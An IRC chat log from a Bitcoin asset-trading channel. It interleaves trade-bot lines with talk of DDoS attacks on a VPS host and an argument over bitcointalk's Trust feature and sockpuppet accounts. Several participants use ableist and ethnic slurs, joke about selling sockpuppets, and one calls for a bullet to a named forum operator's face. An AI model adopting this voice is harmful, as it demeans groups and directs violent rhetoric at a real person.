does May 22 00:29:30 namworld+phungus+arij May 22 00:29:34 its a legit company in austria and waveride is their new product May 22 00:29:54 together with his private gpg key :D May 22 00:29:56 [BTCTC] [ASICMINER-PT] 1 @ 2.5 BTC [+] May 22 00:29:59 LOL May 22 00:30:06 so thats why he had to change it May 22 00:30:20 otherwise they would have had to pay another 30 tribute to mp amirite May 22 00:30:21 :P May 22 00:30:50 [BTCTC] [ASICMINER-PT] 1 @ 2.5 BTC [+] May 22 00:31:00 yes. they weren't willing to do that, just did nothing and waited for mp's deadline to expire May 22 00:31:06 and got delisted from mpex May 22 00:31:09 lol May 22 00:31:27 only after that they listed on btct May 22 00:32:15 having namworld in chan when coinbr got ddosed was the last drop after i fled May 22 00:32:31 despite being warned that i'm on bitvps and it can get ddosed May 22 00:32:37 [BTCTC] [BITVPS] 16 @ 0.000799 = 0.0128 BTC [+] May 22 00:32:37 he did nothing about it May 22 00:32:45 [BTCTC] [ASICMINER-PT] 1 @ 2.5 BTC [+] May 22 00:32:51 and i had to wait 6 hours till they start doing anything about it May 22 00:33:35 he also tried giving you a big ass bill for bandwidth also? May 22 00:33:46 lmao May 22 00:33:48 cant remember May 22 00:33:55 oh i didn't actually fled, got kicked promptly "we aren't that king of hosting" May 22 00:34:09 *kind May 22 00:34:24 [BTCTC] [TAT.ASICMINER] 18 @ 0.026248 = 0.4725 BTC [+] May 22 00:34:31 did mp hire camwhores to dos you or what May 22 00:34:41 why would anyone dos coinbr May 22 00:34:42 no, mp was ddosed first May 22 00:34:48 I can't do an ounce of sysadmin work. I jumped in to protect my large stake in BitVPS before RG left. May 22 00:34:59 just trolls? May 22 00:35:12 and i'm hosting mpex mirror mpex.coinbr.com May 22 00:35:16 We can't afford DDoS protection. Not for the price we get on those VPSes May 22 00:35:19 argh its down May 22 00:35:22 No, there was a huge DDOS attack on a bunch of BTC services May 22 00:35:42 that went on for a week or two? May 22 00:35:44 Although I'm quite sorry about that. May 22 00:35:49 it lasted awhile May 22 00:35:53 [BTCTC] [TAT.ASICMINER] 2 @ 0.026247 = 0.0525 BTC [-] May 22 00:35:56 the ddoser put out all mpex mirrors, yes it took on and off two weeks May 22 00:36:01 [HAVELOCK] [ASICM] 2 @ 0.0269 = 0.0538 BTC [-] May 22 00:36:02 [HAVELOCK] [ASICM] 1 @ 0.02695 BTC [+] May 22 00:36:08 Namworld: is bitvps still operational? May 22 00:36:13 We still have occasional DDoS attacks. And we basically can't deal with them. May 22 00:36:41 Yes. It's still a small operation. Just a few dedicated servers with a few hundred VPS customers. May 22 00:36:58 [BTCTC] [ASICMINER-PT] 1 @ 2.5 BTC [+] May 22 00:37:01 [HAVELOCK] [ASICM] 2 @ 0.02695 = 0.0539 BTC [+] May 22 00:37:44 https://docs.google.com/spreadsheet/pub?key=0AvwwyRGyc1WgdGY4R1VxTm1YbUhEYWVKYnBfMVhZS3c May 22 00:38:04 why is your net profit negative? i dont understand this accounting May 22 00:40:01 [HAVELOCK] [ASICM] 2 @ 0.0269 = 0.0538 BTC [-] May 22 00:40:37 ;;ticker May 22 00:40:37 BTCUSD ticker | Best bid: 122.15003, Best ask: 122.77000, Bid-ask spread: 0.61997, Last trade: 122.77000, 24 hour volume: 15385.46723778, 24 hour low: 121.01000, 24 hour high: 123.08085, 24 hour vwap: 122.14614 May 22 00:40:38 thanks waveride.at is interestin, will research... and it's also close from here May 22 00:40:47 It just lists income/expenses May 22 00:40:51 jurov what's down ? May 22 00:40:58 mpex mirror May 22 00:41:01 It can go in the negative May 22 00:41:03 o. ok. May 22 00:41:21 Negative amounts indicates we spent more than we had. May 22 00:41:26 jurov: i bought their 8GB offer, paid 1 year in advance (100 EUR) May 22 00:41:44 server is pretty darn fast May 22 00:41:48 mircea-popescu , deposit please May 22 00:42:07 fiat500: DDoS (either inbound or outbound) is not acceptable. IPs are nullrouted for a minimum of 12 hours, and we reserve the right to terminate your contract. May 22 00:42:16 ^^from waveride faq May 22 00:42:23 so, not suitable for frontend May 22 00:43:06 that doesn't sound like a hoster at all anyway May 22 00:43:39 just low-pricing, low-support vps host May 22 00:44:01 [BTCTC] [ASICMINER-PT] 1 @ 2.5 BTC [+] May 22 00:44:01 jurov: ouch, sucks May 22 00:44:25 "we sell shoes. rain is not acceptable. we will not refund your purchase if you wear your shoes in the rain" May 22 00:44:37 i'm sorry, that's not a shoe, and that's not hosting. May 22 00:44:39 [BTCTC] [TAT.ASICMINER] 20 @ 0.025403 = 0.5081 BTC [-] May 22 00:44:42 [BTCTC] [TAT.ASICMINER] 20 @ 0.025402 = 0.508 BTC [-] May 22 00:44:47 [BTCTC] [TAT.ASICMINER] 20 @ 0.025401 = 0.508 BTC [-] May 22 00:44:49 [BTCTC] [TAT.ASICMINER] 1 @ 0.0254 BTC [-] May 22 00:44:54 [BTCTC] [TAT.ASICMINER] 20 @ 0.024999 = 0.5 BTC [-] May 22 00:45:01 yes they actually exist. they sell them as "TV-shoes" May 22 00:45:05 ;;ticker May 22 00:45:05 BTCUSD ticker | Best bid: 122.20001, Best ask: 122.68000, Bid-ask spread: 0.47999, Last trade: 122.78000, 24 hour volume: 15381.36069750, 24 hour low: 121.01000, 24 hour high: 123.08085, 24 hour vwap: 122.14596 May 22 00:45:07 [BTCTC] [TAT.ASICMINER] 20 @ 0.024998 = 0.5 BTC [-] May 22 00:45:25 [BTCTC] [TAT.ASICMINER] 2 @ 0.026247 = 0.0525 BTC [+] May 22 00:45:25 to be used only indoors for watching tv May 22 00:45:32 [BTCTC] [TAT.ASICMINER] 19 @ 0.026248 = 0.4987 BTC [+] May 22 00:45:33 ;;calc 1160 / 122.14596 May 22 00:45:33 9.49683477047 May 22 00:45:36 Namworld: im not seeing any amortization of income here, when someone pays you for 3 months of hosting, it should be amortized over 3 months in your statements and reflected as such in the dividends May 22 00:45:50 [BTCTC] [ASICMINER-PT] 1 @ 2.5 BTC [+] May 22 00:45:56 makes the relationship between your income and your costs a lot clearer as well, just a thought May 22 00:45:59 [BTCTC] [ASICMINER-PT] 1 @ 2.5 BTC [+] May 22 00:46:35 that is a point. May 22 00:46:44 GoMaD GordonG3kko gribble Guest3893 Guest85004 guruvan May 22 00:46:45 [BTCTC] [ASICMINER-PT] 2 @ 2.5 = 5 BTC [+] May 22 00:47:01 [HAVELOCK] [ASICM] 10 @ 0.0269 = 0.269 BTC [-] May 22 00:47:27 In the United States, at least 9% of school-aged children have been diagnosed with ADHD, and are taking pharmaceutical medications. In France, the percentage of kids diagnosed and medicated for ADHD is less than .5%. May 22 00:47:28 heh. May 22 00:47:43 [BTCTC] [ASICMINER-PT] 1 @ 2.5 BTC [+] May 22 00:48:04 my bet is that if all american children were tested that % would rise dramatically May 22 00:48:20 mircea_popescu: just to be picky, are they comparing % diagnosed with % "diagnosed and medicated"? May 22 00:48:33 americans have some medication disorder May 22 00:48:39 ah nvm, failed to read May 22 00:48:48 [BTCTC] [ASICMINER-PT] 2 @ 2.5 = 5 BTC [+] May 22 00:48:54 [BTCTC] [ASICMINER-PT] 3 @ 2.5 = 7.5 BTC [+] May 22 00:49:23 maybe i need some ritalin too :P May 22 00:49:30 jurov totally. May 22 00:49:38 [BTCTC] [ASICMINER-PT] 3 @ 2.5 = 7.5 BTC [+] May 22 00:49:45 fiat500 it's an article in a trade magazine. do not expect sources or anything May 22 00:50:01 [HAVELOCK] [ASICM] 133 @ 0.0269 = 3.5777 BTC [-] May 22 00:50:02 [BTCTC] [ASICMINER-PT] 8 @ 2.5 = 20 BTC [+] May 22 00:50:03 [HAVELOCK] [ASICM] 67 @ 0.0269 = 1.8023 BTC [-] May 22 00:50:33 Consistently enforced limits, in the French view, make children feel safe and secure. Clear limits, they believe, actually make a child feel happier and safer—something that is congruent with my own experience as both a therapist and a parent. Finally, French parents believe that hearing the word "no" rescues children from the "tyranny of their own desires." And spanking, when used judiciously, is not considered chil May 22 00:50:33 d abuse in France. May 22 00:50:34 there. May 22 00:51:05 [BTCTC] [ASICMINER-PT] 1 @ 2.5 BTC [+] May 22 00:51:38 mircea_popescu: what do you use to automatically convert the irclogs to html? May 22 00:51:53 slave labour. May 22 00:51:59 taub: kakobrekla did the logging May 22 00:52:10 or do you mean the logs.bitcoin site ? May 22 00:52:11 oh you mean trilema snippets? May 22 00:52:14 lol May 22 00:52:19 no, the logs.bitcoin May 22 00:52:26 [BTCTC] [ASICMINER-PT] 1 @ 2.5 BTC [+] May 22 00:52:29 haha May 22 00:52:35 hehe May 22 00:52:47 mircea_popescu: hows the bot doing these days May 22 00:52:48 ok, that's kakobrekla's magic. i think he wrote some script May 22 00:53:01 fiat500 humming along, singin' a song... May 22 00:53:01 he enslaved assbot May 22 00:53:03 flatlands are hard to bot May 22 00:53:36 mircea_popescu , flush please May 22 00:53:37 [BTCTC] [ASICMINER-PT] 2 @ 2.5 = 5 BTC [+] May 22 00:53:50 theres a bunch of log2html type apps around May 22 00:53:55 [BTCTC] [TAT.ASICMINER] 1 @ 0.026248 BTC [+] May 22 00:54:05 bot modules etc May 22 00:54:23 [BTCTC] [TAT.ASICMINER] 20 @ 0.026248 = 0.525 BTC [+] May 22 00:55:01 [HAVELOCK] [ASICM] 40 @ 0.0257 = 1.028 BTC [-] May 22 00:55:02 yea that was the keyword i was missing, html May 22 00:55:06 [BTCTC] [ASICMINER-PT] 3 @ 1.8 = 5.4 BTC [-] May 22 00:55:13 jborkl i saw it teh first time, it's in process. May 22 00:55:19 I googled irc log converters n stuff May 22 00:55:32 oh ok, Thanks May 22 00:56:23 taub: if you're gonna resell #assets conversation, i wanna get paid May 22 00:57:28 [BTCTC] [S.BBET-PT] 9 @ 0.01974 = 0.1777 BTC [+] May 22 00:57:39 1 pinch of bitcoin per line May 22 00:57:43 hah its for different channels May 22 00:58:01 and that pricing seems like it could be exploited May 22 00:58:03 [BTCTC] [TAT.ASICMINER] 130 @ 0.026248 = 3.4122 BTC [+] May 22 00:58:30 [BTCTC] [ASICMINER-PT] 3 @ 2.5 = 7.5 BTC [+] May 22 00:58:38 how exploited? May 22 00:58:49 by you spamming the channel making me pay May 22 00:59:54 nah, we have unregulated free market here, it will solve everything May 22 01:00:49 [BTCTC] [TAT.ASICMINER] 88 @ 0.026249 = 2.3099 BTC [+] May 22 01:01:01 [HAVELOCK] [ASICM] 2 @ 0.0267 = 0.0534 BTC [+] May 22 01:02:00 [HAVELOCK] [SDICE] 3 @ 0.2381 = 0.7143 BTC [-] May 22 01:02:40 !ticker mp s.dice May 22 01:02:41 [MPEX:S.DICE] 1D: 0.00251997 / 0.00251997 / 0.00251997 (1000 shares, 2.52 BTC), 7D: 0.00135 / 0.00236989 / 0.003 (45726 shares, 108.37 BTC), 30D: 0.00135 / 0.0028801 / 0.00349995 (246718 shares, 710.57 BTC) May 22 01:03:01 [HAVELOCK] [ASICM] 27 @ 0.0268 = 0.7236 BTC [+] May 22 01:03:08 unregulated free market ftw May 22 01:03:16 until shit explodes of course May 22 01:04:01 [HAVELOCK] [ASICM] 13 @ 0.0268 = 0.3484 BTC [+] May 22 01:04:02 [HAVELOCK] [ASICM] 2 @ 0.02689999 = 0.0538 BTC [+] May 22 01:04:04 [HAVELOCK] [ASICM] 18 @ 0.0269 = 0.4842 BTC [+] May 22 01:07:57 [BTCTC] [TAT.ASICMINER] 10 @ 0.025003 = 0.25 BTC [-] May 22 01:08:01 [HAVELOCK] [SDICE] 3 @ 0.23810001 = 0.7143 BTC [+] May 22 01:08:07 [BTCTC] [TAT.ASICMINER] 59 @ 0.025002 = 1.4751 BTC [-] May 22 01:08:44 [BTCTC] [TAT.ASICMINER] 12 @ 0.026249 = 0.315 BTC [+] May 22 01:08:51 [BTCTC] [TAT.ASICMINER] 10 @ 0.026248 = 0.2625 BTC [-] May 22 01:09:01 [HAVELOCK] [SDICE] 40 @ 0.2381 = 9.524 BTC [-] May 22 01:09:34 [BTCTC] [TAT.ASICMINER] 3 @ 0.026249 = 0.0787 BTC [+] May 22 01:09:47 [BTCTC] [TAT.ASICMINER] 7 @ 0.025002 = 0.175 BTC [-] May 22 01:10:52 [BTCTC] [TAT.ASICMINER] 20 @ 0.025003 = 0.5001 BTC [+] May 22 01:10:56 [BTCTC] [TAT.ASICMINER] 3 @ 0.025002 = 0.075 BTC [-] May 22 01:11:01 [HAVELOCK] [VTX] 1 @ 0.4257 BTC [+] May 22 01:11:22 wats this new trust widget on the forum May 22 01:11:48 web of fail May 22 01:11:49 scam stuff May 22 01:12:28 buttcointalk.org by scammers, for scammers May 22 01:12:53 lol May 22 01:13:00 It's just to leave feedback, OTC style May 22 01:18:24 Good idea imo May 22 01:18:34 sure it's not the original recipe otc May 22 01:18:42 and has flaws May 22 01:18:51 but I will make use of it May 22 01:18:51 its a fucking terrible idea May 22 01:19:27 what is the core flaw in comparison to regular otc wot? May 22 01:20:01 forum users are dumber than wot users May 22 01:20:03 [BTCTC] [TAT.ASICMINER] 10 @ 0.025812 = 0.2581 BTC [+] May 22 01:20:22 they wont check that someones >9000 trust rating is comprised entirely of sockpuppets May 22 01:20:41 so you are concerned for the noobs? May 22 01:20:58 it will lead to more scams, more bitcoin hate May 22 01:21:01 [HAVELOCK] [SDICE] 1 @ 0.2381 BTC [-] May 22 01:21:16 wot is just as hackable no? May 22 01:21:20 dub i don't have a problem with it specifically because they don't call it wot anything May 22 01:21:31 consequently... who cares. another web thing that doesn't work. May 22 01:21:47 otc wot can be gamed yes May 22 01:22:05 but theres a much higher BTE so users are more savvy to fake rating May 22 01:22:22 so wot is better because it requires smarter scammers? May 22 01:22:31 yes May 22 01:22:43 ok then May 22 01:23:06 [BTCTC] [ASICMINER-PT] 2 @ 2.499999 = 5 BTC [-] May 22 01:23:08 [BTCTC] [ASICMINER-PT] 8 @ 2.5 = 20 BTC [+] May 22 01:23:20 even if i wanted to accept that (which is quite debatable) that doesnt make btctalk Trust a "fucking horrible idea" May 22 01:23:25 kakobrekla, i propose to put into topic: Our scammers are smarter. May 22 01:23:35 what we have now is the official bitcoin website giving scammers good trust ratings May 22 01:23:56 many a noob will see a good rating and get scammed May 22 01:24:01 22:21 < ThickAsThieves> wot is just as hackable no? May 22 01:24:06 maybe they will tighten up socking or create othe rmitigating features May 22 01:24:14 one thing about wot is it is plainly obvious if its being gamed May 22 01:24:24 as you can tell where the ratings are coming from May 22 01:24:26 they wont, they(mos) will continue to be a retard May 22 01:24:42 i wonder how it works together with scammer tag May 22 01:24:53 maybe you get auto-tagged May 22 01:24:53 or theymos forget to do it May 22 01:24:54 hehe May 22 01:25:06 scammer is the modern with hunt May 22 01:25:12 sockpuppet trust FTW May 22 01:25:13 this is all very medieval isnt it May 22 01:25:21 *witch May 22 01:25:28 lets say conservatively 90% of btctalk accoutns are sockies May 22 01:25:49 ... May 22 01:25:52 look at the ripple claiming thread if you need convincing May 22 01:25:54 thats ocnservative? May 22 01:25:58 easy 90 May 22 01:26:01 [HAVELOCK] [SDICE] 1 @ 0.2381 BTC [-] May 22 01:26:02 yes, dub and theymos are the only real accts there May 22 01:26:03 at least 99 May 22 01:26:07 LOL May 22 01:26:09 maybe even 100% May 22 01:26:15 im srs May 22 01:26:23 oh me too May 22 01:26:24 totally May 22 01:26:28 someone is gamign the ripple thread with an automated process May 22 01:26:33 i am just theymos in disguise May 22 01:26:42 i am me in disguise May 22 01:26:49 (who is theymos?) May 22 01:26:55 actually i dont care, nvm May 22 01:26:59 hes the fuckwit running bitcointalk May 22 01:27:03 you're your own sockpuppet, gtfo May 22 01:27:46 it's kinda funny, the idea that there would be as many or more socks than real people May 22 01:27:57 kinda means everyone is a scammer to call it 90% May 22 01:28:09 that or no one has any balls whatsoever May 22 01:28:23 10% balls May 22 01:28:25 its kinda funny that you have a problem with reality May 22 01:28:28 [BTCTC] [TAT.ASICMINER] 15 @ 0.0255 = 0.3825 BTC [-] May 22 01:28:36 seems to be you with that problem May 22 01:28:46 i'm okay with it May 22 01:29:09 dub: you are pulling numbers out of your ass though May 22 01:29:11 [BTCTC] [RSM] 25 @ 0.009501 = 0.2375 BTC [-] May 22 01:29:16 there's no denying that May 22 01:29:55 maybe i should open a btctalk sockpuppeting service May 22 01:30:04 sounds like a big market May 22 01:30:16 ThickAsThieves: run ads on btctalk May 22 01:30:27 you guys are just naive as fuck May 22 01:30:39 yeah all i need to do is win their retarded ad auction May 22 01:30:44 dub: you may have a point but where are you getting your numbers from May 22 01:31:07 burden of proof is on you really, we cant prove a negative May 22 01:31:11 https://bitcointalk.org/index.php?board=67.0 May 22 01:31:18 look at this thread May 22 01:31:34 realise that there arethousands of fake accounts in that one alone May 22 01:31:47 where are they? May 22 01:31:48 deposits flushed ftr. May 22 01:32:26 dub how the fuck is bitcointalk "the official" anuything ? May 22 01:32:31 mircea_popescu: default May 22 01:32:34 the official comedy goldclub maybe. May 22 01:32:46 dub, wrong link.. unless you want to say we have sockpuppet altcoins now May 22 01:32:49 i think he means where shit tends to happen May 22 01:33:09 yes. shit. May 22 01:33:15 jurov: https://bitcointalk.org/index.php?topic=145506.0 sorry May 22 01:33:30 what is this ripple thread gaming ? May 22 01:33:42 free ripples May 22 01:33:46 so what May 22 01:33:50 mmmm... so ? May 22 01:33:51 what did they expect May 22 01:33:54 [BTCTC] [TAT.ASICMINER] 10 @ 0.0254 = 0.254 BTC [-] May 22 01:33:54 lol. duh ? May 22 01:33:55 jesus May 22 01:33:59 why bother May 22 01:34:00 [BTCTC] [ASICMINER-PT] 2 @ 2.5 = 5 BTC [+] May 22 01:34:03 indeed May 22 01:34:09 dub simmer down and explain what you mean, what. we're slow. May 22 01:34:24 you make it out to be like Trust as afeatrure will create more crimes and more criminals May 22 01:34:25 but only accounts registered before feb 19 get these ripples May 22 01:34:33 scammers gon scam May 22 01:34:44 I'm saying somewhere around 90% of bitcointalk accoutns will be dupes/sockpuppets May 22 01:34:48 ThickAsThieves well badly implemented "trust" features do create criminals. May 22 01:34:51 im using that thread as evidense May 22 01:34:54 dub as opposed to now ?! May 22 01:35:00 [HAVELOCK] [ASICM] 2 @ 0.0268 = 0.0536 BTC [-] May 22 01:35:19 dude get out, it's like, my girl. some sa goons, a coupla bitcoin jezuzez, five noobs and about 56895468059860983 nigerians May 22 01:35:25 and who'd name puppets like "turdhole" and "Catethysis"? May 22 01:35:25 [BTCTC] [TAT.ASICMINER] 31 @ 0.0254 = 0.7874 BTC [-] May 22 01:35:27 [BTCTC] [TAT.ASICMINER] 20 @ 0.0254 = 0.508 BTC [-] May 22 01:35:34 Dub, if btctalk doesnt allow Trust to actually be trustworthy, people won't trust it May 22 01:35:40 no, they will. May 22 01:35:49 people are so retarded they're MORE likely to trust it if it's broken May 22 01:35:54 they will because they are retarded May 22 01:35:58 beat you to it May 22 01:36:01 mircea_popescu: exactly May 22 01:36:02 smarter people will be no more affected than smart people using wot May 22 01:36:12 I feel retarded for having to explain this May 22 01:36:18 you dont have to May 22 01:36:24 we all know what youre trying to say May 22 01:36:32 [BTCTC] [TAT.ASICMINER] 20 @ 0.025499 = 0.51 BTC [+] May 22 01:36:34 yea, what you should explain is why you rthink this is important. May 22 01:36:47 I already have but ok May 22 01:36:56 [BTCTC] [ASICMINER-PT] 2 @ 2.5 = 5 BTC [+] May 22 01:36:59 bitcoin talk i steh defacto bitcoin website, sad as it may be May 22 01:37:01 [HAVELOCK] [ASICM] 42 @ 0.0269 = 1.1298 BTC [+] May 22 01:37:02 [HAVELOCK] [ASICM] 98 @ 0.02695 = 2.6411 BTC [+] May 22 01:37:03 there;s a hidden assumption here somewhere. May 22 01:37:07 a ok, there it is. May 22 01:37:09 it is the fist point of call for every fucking noob May 22 01:37:15 [BTCTC] [TAT.ASICMINER] 9 @ 0.025812 = 0.2323 BTC [+] May 22 01:37:15 first point too May 22 01:37:17 if i look up someone's trust and it all comes from randoms, i wont value it May 22 01:37:19 bitcointalk has as much to do with bitcoin as comedy central has to do with the us govt./ May 22 01:37:21 [BTCTC] [ASICMINER-PT] 9 @ 2.5 = 22.5 BTC [+] May 22 01:37:49 having a bunch of scammers with high trust ratings they have gamed will lead to more noobs gettign scammed May 22 01:37:52 now, granted that some random achmed fresh off the boat may think southpark is the official us dept of state pr. May 22 01:37:55 [BTCTC] [TAT.ASICMINER] 11 @ 0.025812 = 0.2839 BTC [+] May 22 01:37:59 mircea_popescu: that is entirely bullshit and you know it May 22 01:38:05 i know no such thing. May 22 01:38:08 dub, here;s another way to look at it May 22 01:38:11 who exactly takes btctalk seriously ? May 22 01:38:17 those fucking 5 coins under our names May 22 01:38:22 that's used as trust already May 22 01:38:25 Hero member May 22 01:38:26 the -dev people have it aliased as trolltalk. i don't give a shit about what they sasy there, any more than reddit or w/e May 22 01:38:26 donor May 22 01:38:27 etc May 22 01:38:28 mircea_popescu: lots of people that are stupid (99.9999999% of bitcoin) May 22 01:38:28 nobody i know does. May 22 01:38:30 [BTCTC] [ASICMINER-PT] 3 @ 2.5 = 7.5 BTC [+] May 22 01:38:37 who ? who is this person who takes btctalk seriously ? May 22 01:38:40 the coins are even easier to game May 22 01:38:55 [BTCTC] [ASICMINER-PT] 6 @ 2.5 = 15 BTC [+] May 22 01:38:57 [BTCTC] [ASICMINER-PT] 3 @ 2.5 = 7.5 BTC [+] May 22 01:38:59 its just enabling more scamming, that is all May 22 01:39:01 [HAVELOCK] [ASICM] 74 @ 0.02695 = 1.9943 BTC [+] May 22 01:39:13 giving noobs another nugget of false trust May 22 01:39:19 yes, but... listen May 22 01:39:30 isn't it ideal for noobs to be deluged in fake trust nuggets ? May 22 01:39:39 if you can't stop them all, then isn't an infinity the best solution ? May 22 01:39:50 mircea_popescu: ffs, you and I know that btctalk is a steaming pile of web anus, the rest of the world does not May 22 01:39:57 so why do we care ? May 22 01:40:05 because cnn May 22 01:40:08 fuck that May 22 01:40:13 we have the btc. the rest of the world does not. May 22 01:40:18 [BTCTC] [S.MPOE-PT] 30 @ 0.000666 = 0.02 BTC [+] May 22 01:40:19 in the process of suckling our cock to get some btc, May 22 01:40:24 these noobs WANT to trust, they dont even need Trust as a feature May 22 01:40:27 cnn has amir taaki already May 22 01:40:27 the world is welcome to run into as many poles as it needs to May 22 01:40:37 [BTCTC] [TAT.ASICMINER] 33 @ 0.02599 = 0.8577 BTC [+] May 22 01:40:38 lmfao May 22 01:40:46 eastern european humor? May 22 01:40:55 which part ? May 22 01:40:57 i mean look at this shit May 22 01:40:58 https://bitcointalk.org/index.php?topic=149458.msg2225212#msg2225212 May 22 01:41:01 [HAVELOCK] [ASICM] 5 @ 0.02695 = 0.1348 BTC [+] May 22 01:41:03 poles May 22 01:41:06 "Starting to worry here too. Five missed promises is ok, but six is where I draw the line." May 22 01:41:16 bwahahaha what ? May 22 01:41:20 fiat500 that slipped in. May 22 01:41:25 like a mexican. May 22 01:41:26 just because it is a bag of dicks now, does notmean we should be happy about piling anus on top of it May 22 01:41:35 dub why ? May 22 01:42:02 hahaha May 22 01:42:04 if you dont like it, go out and educate the legion of idiots May 22 01:42:16 impossible May 22 01:42:19 exactly May 22 01:42:23 i have been paying top dollar for one person to try and educate legions of idiots. May 22 01:42:30 she took a lot of time, the results are there, but May 22 01:42:40 most idiots are still left in their original state. May 22 01:42:46 dub: im looking at a bunch of morons May 22 01:42:48 you're contradicting yourself May 22 01:42:48 but, not sockies May 22 01:42:52 dub where ? May 22 01:43:13 i mean, its more likely that they are all just idiots than there being a massive conspiracy behind every thread May 22 01:43:14 mircea_popescu: in one breath, let teh noobs be scammed, in the next you're paying people to educate noobs May 22 01:43:26 maybe think of it this way dub, May 22 01:43:35 This Trust feature being gamed, May 22 01:43:35 i am paying people to educate noobs. let them be scammed. both work : either follow the light or go into the shitfest May 22 01:43:40 is doing the educating for you May 22 01:43:41 fiat500: very high instance of new accounts with few posts May 22 01:43:43 people gotta have their choices. there's no education w/o choice. May 22 01:44:04 dub: bitcoin has been getting a lot of attention recently, its to be expected May 22 01:44:24 fiat500: no its not May 22 01:44:39 once a noob relies on trust and gets burned enough times, guess what, he no longer trusts so easily May 22 01:44:45 you should be thanking Theymos May 22 01:44:50 I know he needs the money May 22 01:44:51 ;) May 22 01:45:05 ThickAsThieves i'll tell you how this goes : May 22 01:45:07 to add more Trust features May 22 01:45:10 [BTCTC] [ASICMINER-PT] 1 @ 2.575 BTC [+] May 22 01:45:17 idiot person comes in. mpoe-pr tells him he's an idiot gives him a reading list. May 22 01:45:26 idiot goes fu mpoe-pr scammor child pedophile gypsy May 22 01:45:28 idiot gets burned May 22 01:45:35 idiot goes fu bitcoin scamfest shit poopoo May 22 01:45:36 its a pretty brokewn approach yes May 22 01:45:38 idiot leaves May 22 01:45:45 same idiot returns later, without his memories May 22 01:45:50 rinse repeat May 22 01:45:53 ok but May 22 01:45:57 idiots that NEVER learn May 22 01:46:01 [HAVELOCK] [SDICE] 3 @ 0.24699999 = 0.741 BTC [+] May 22 01:46:04 I think we get a lot more value from a bullet delivered to theymos face May 22 01:46:06 can't be what decide features May 22 01:46:08 but they're different physical vessels of the same one idiot. May 22 01:46:14 LOL May 22 01:46:14 and there's like 10bn bodies on this earth May 22 01:46:42 bitcointalk is the single biggest impediment to people learnign about bitcoin May 22 01:46:46 there's like... one douche that inhabits 9.95 bn of them May 22 01:46:56 dub true. now that taaki is maffed out May 22 01:46:58 i dont think any of us want a world where we forgo new ideas because hopeless idiots wouldnt get it May 22 01:47:00 [HAVELOCK] [ASICM] 42 @ 0.02695 = 1.1319 BTC [+] May 22 01:47:11 ThickAsThieves: its not a new idea, its a stupid old idea May 22 01:47:23 one that has been proven broken time and time again May 22 01:47:23 new conveniences then May 22 01:47:24 its a great old idea very badly newly implemented. May 22 01:47:36 so let them evolve it May 22 01:47:43 wait wut. what;'s been proven broken you mean, the wot ? May 22 01:48:30 here's another angle I 'm realizing, omg there will be SO much whining when noobs get their first -1 trust May 22 01:49:02 mircea_popescu: trust systems that are too easy to game May 22 01:49:02 totally. May 22 01:49:14 dub all trust systems that work can also be gamed. May 22 01:49:43 a trust system is a notation, like paper. it won't do your work for you in any circumstance. May 22 01:49:56 it's just there so you have a reference for your thoughts. it doesn't put thoughts in your head. May 22 01:50:06 as I said before, at least with otc wot you have to be slightly smarter than brain dead to use it May 22 01:50:21 you are far more likely tp be able to recognise fake ratings May 22 01:50:31 [BTCTC] [ASICMINER-PT] 1 @ 2.57 BTC [-] May 22 01:50:44 than some shoe drooling forum goer May 22 01:50:56 but why do we care of the fate of the braindead ? May 22 01:51:03 [BTCTC] [TAT.ASICMINER] 8 @ 0.02597 = 0.2078 BTC [-] May 22 01:51:21 and when the googlenet tells you which website to get bitcoin from and you go there and see highly trusted guy and he scams you May 22 01:51:32 its abad thing for bitcoin May 22 01:51:49 is it ? May 22 01:51:56 i mean... it will keep like people away, right ? May 22 01:52:08 stop trolling May 22 01:52:14 no, i am serious. honestly. May 22 01:52:19 let's go another angle at this. May 22 01:52:30 suppose this reputational thing is actually a bitcoin weakness as you propose. May 22 01:52:41 the government can then make 50000 sockpuppets, scam itself and kill btc this wya ? May 22 01:52:53 you expend signficant effort trying to educate these same noobs with angruy women May 22 01:52:58 i do. May 22 01:53:06 you rage against teh dev team for slowing adoption May 22 01:53:18 understand : going fishing is a process directed AT THE FISH. you don;t care about the sea. May 22 01:53:33 the sea per se is about as interesting to you as that much sand. May 22 01:53:34 you understand my concern and are being contary May 22 01:53:47 i understand your concern and honestly believe that it's being misplaced. May 22 01:54:35 and i raged at the dev team for behaving idiotically. if you're blind you don't run and if you don't comprehend your code you don't add more. this on one hand May 22 01:54:41 [BTCTC] [TAT.ASICMINER] 3 @ 0.02597 = 0.0779 BTC [-] May 22 01:54:45 [BTCTC] [TAT.ASICMINER] 19 @ 0.02597 = 0.4934 BTC [-] May 22 01:54:52 on the other hand no matter what you do you don't go into telling users how to use your output. May 22 01:55:00 [HAVELOCK] [ASICM] 1 @ 0.02690001 BTC [-] May 22 01:55:02 [BTCTC] [TAT.ASICMINER] 1 @ 0.02597 BTC [-] May 22 01:55:10 these are to date the only two tripwires the devteam managed to bumble over resulting in bitchslaping etc. May 22 01:55:32 and i use "devteam" somewhat loosely here. May 22 01:56:07 jborkl in case you missed it i did say flushed a few lines back May 22 01:56:36 [BTCTC] [ASICMINER-PT] 2 @ 2.57 = 5.14 BTC [-] May 22 01:57:17 [BTCTC] [ASICMINER-PT] 1 @ 2.573999 BTC [+] May 22 01:57:38 guess the correction is over May 22 01:57:47 [BTCTC] [TAT.ASICMINER] 5 @ 0.02597 = 0.1299 BTC [-] May 22 01:57:53 im going to wake up to AM having peaked at 3.0 arent i May 22 01:58:01 i'm trying to use this Trust thing and getting a db error May 22 01:58:02 3.141592 May 22 01:58:04 dub hacked it May 22 01:58:08 lmao May 22 01:58:20 eureka May 22 01:58:21 tell me it allows sql injections and you're going to delete the btctalk db May 22 01:58:30 I wish May 22 01:58:44 [BTCTC] [ASICMINER-PT] 4 @ 2.573999 = 10.296 BTC [+] May 22 01:58:56 nah it was just an in-site status message May 22 01:59:06 maybe you can only leave trust every x minutes? May 22 01:59:11 lulz injection vulnerability May 22 01:59:21 lol May 22 02:00:01 [HAVELOCK] [HIM] 1 @ 2.28 BTC [+] May 22 02:00:51 it has a Risked BTC field May 22 02:00:59 maybe it doesnt believe me May 22 02:01:23 wow that really was the problem May 22 02:01:36 it won't accept 4 figures May 22 02:01:43 Winklevoss: are you the real Winklevoss May 22 02:01:51 this is really the root of the problem May 22 02:01:54 lol May 22 02:02:06 lmao May 22 02:02:16 even the most prolific otc-wot users are completely retarded May 22 02:02:16 so forum knows it's not really for big txs May 22 02:02:36 bcb is prolific and that's the most you can say about him May 22 02:02:45 especially if you're kindly disposed. May 22 02:02:57 I can say that hes a shit eating toolbag May 22 02:03:28 LOL May 22 02:03:48 that's not saying much. May 22 02:04:54 